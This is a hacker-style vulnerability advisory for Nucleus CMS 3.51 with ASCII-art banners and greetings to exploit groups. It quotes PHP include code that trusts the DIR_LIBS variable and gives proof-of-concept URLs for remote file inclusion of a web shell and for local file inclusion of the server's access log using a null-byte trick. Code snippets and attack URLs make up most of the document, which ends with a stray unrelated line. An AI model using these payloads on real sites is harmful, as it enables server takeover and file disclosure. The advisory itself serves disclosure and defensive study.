######################################################## Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability ######################################################## __________ /\_`\ /\ \__/\ \__/\ \ \ \ \L\_\_______\ \ \/'\ /\_\_____\ \ ,_\ \ \_____ \ \_\/\ \/\ \/'___\ \ , < \/\ \ /' _ `\/'_ `\ \ \ \/\ \_ `\/'__`\ \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ ____________ Author:eidelweiss /\ \__/\ \/\ \/\_\ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____ \ \ \ \ \ \ \/'__`\ \ '__`\ \ \__ \/\ '__`\/\ '__`\/',__\ \ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\ \ `\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/ '\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/ \ \_\ \ \_\ \/_/\/_/ [+]Software:Nucleus CMS [+]Version: Nucleus v3.51 (Other or lower version may also be affected) [+]License: GNU/GPL (Free Software) [+]Homepage: http://nucleuscms.org/download.php [+]Download: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download ######################################################## [!]Discovered: eidelweiss [!]Contact: eidelweiss[at]cyberservices[dot]com [!]Thank`s: sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db) JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to) ######################################################## -=[Description]=- Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL) ######################################################## -=[VUln Code]=- ********************************** [-][path_to_nucleus]/action.php $CONF = array(); require('./config.php'); // common functions include_once($DIR_LIBS . 'ACTION.php'); $action = requestVar('action'); $a =& new ACTION(); $errorInfo = $a->doAction($action); ********************************** [-][path_to_nucleus]/nucleus/xmlrpc/server.php $CONF = array(); require("../../config.php"); // include Nucleus libs and code include($DIR_LIBS . "xmlrpc.inc.php"); include($DIR_LIBS . "xmlrpcs.inc.php"); ********************************** [-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php $strRel = '../../../'; require($strRel . 'config.php'); include($DIR_LIBS . 'PLUGINADMIN.php'); ######################################################## -=[ P0C ]=- Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll] Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll] Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00 or Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00 ###############################=[E0F]=###################################
体验盒子
